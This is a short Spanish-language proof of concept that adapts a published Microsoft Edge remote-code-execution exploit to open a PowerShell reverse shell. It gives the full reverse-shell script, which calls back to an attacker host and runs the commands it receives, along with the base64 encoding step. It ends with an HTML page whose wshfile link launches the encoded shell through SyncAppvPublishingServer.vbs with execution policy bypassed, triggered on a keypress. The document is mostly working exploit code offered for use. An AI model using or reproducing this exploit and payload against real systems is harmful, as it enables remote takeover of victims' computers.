PoC para ejecutar una shell inversa en Powershell a partir de la PoC del autor (https://leucosite.com/Microsoft-Edge-RCE/) para la vulnerabilidad de RCE en Microsoft Edge.
Primero necesitamos crear un socket que haga una conexión inversa en Powershell:
$socket = new-object System.Net.Sockets.TcpClient('x.x.x.x', 8080);if($socket -eq $null){exit 1}$stream = $socket.GetStream();$writer = new-object System.IO.StreamWriter($stream);$buffer = new-object System.Byte[] 1024;$encoding = new-object System.Text.AsciiEncoding;do{$writer.Write("BertoShell> ");$writer.Flush();$read = $null;while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0,1024)) -eq $null){}$out = $encoding.GetString($buffer, 0,$read).Replace("`r`n","").Replace("`n","");if(!$out.equals("exit")){$out = $out.split(' ');$res = [string](&$out[0] $out[1..$out.length]);if($res -ne $null){ $writer.WriteLine($res)}}}While (!$out.equals("exit"))$writer.close();$socket.close();
La codificamos en base64:
user@kali1:~$ cat ~/shellcode.txt | iconv --to-code UTF-16LE |base64
Y sustituimos la llamada a la calculadora en la PoC del autor por la llamando a nuestra shell en Powershell:
<a id="q" href='wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;powershell -ep bypass -enc JABzAG8AYwBrAGUAdAAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAGMAcABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQA5ADQALgA0ADUALgAxADYAOAAnACwAIAA4ADAAOAAwACkAOwBpAGYAKAAkAHMAbwBjAGsAZQB0ACAALQBlAHEAIAAkAG4AdQBsAGwAKQB7AGUAeABpAHQAIAAxAH0AJABzAHQAcgBlAGEAbQAgAD0AIAAkAHMAbwBjAGsAZQB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAJAB3AHIAaQB0AGUAcgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7ACQAYgB1AGYAZgBlAHIAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAcwBjAGkAaQBFAG4AYwBvAGQAaQBuAGcAOwBkAG8AewAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAIgBCAGUAcgB0AG8AUwBoAGUAbABsAD4AIAAiACkAOwAkAHcAcgBpAHQAZQByAC4ARgBsAHUAcwBoACgAKQA7ACQAcgBlAGEAZAAgAD0AIAAkAG4AdQBsAGwAOwB3AGgAaQBsAGUAKAAkAHMAdAByAGUAYQBtAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQAgAC0AbwByACAAKAAkAHIAZQBhAGQAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAMQAwADIANAApACkAIAAtAGUAcQAgACQAbgB1AGwAbAApAHsAfQAkAG8AdQB0ACAAPQAgACQAZQBuAGMAbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAJAByAGUAYQBkACkALgBSAGUAcABsAGEAYwBlACgAIgBgAHIAYABuACIALAAiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAGAAbgAiACwAIgAiACkAOwBpAGYAKAAhACQAbwB1AHQALgBlAHEAdQBhAGwAcwAoACIAZQB4AGkAdAAiACkAKQB7ACQAbwB1AHQAIAA9ACAAJABvAHUAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAOwAkAHIAZQBzACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACYAJABvAHUAdABbADAAXQAgACQAbwB1AHQAWwAxAC4ALgAkAG8AdQB0AC4AbABlAG4AZwB0AGgAXQApADsAaQBmACgAJAByAGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAgACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUATABpAG4AZQAoACQAcgBlAHMAKQB9AH0AfQBXAGgAaQBsAGUAIAAoACEAJABvAHUAdAAuAGUAcQB1AGEAbABzACgAIgBlAHgAaQB0ACIAKQApACQAdwByAGkAdABlAHIALgBjAGwAbwBzAGUAKAApADsAJABzAG8AYwBrAGUAdAAuAGMAbABvAHMAZQAoACkAOwA=;"'>test</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script>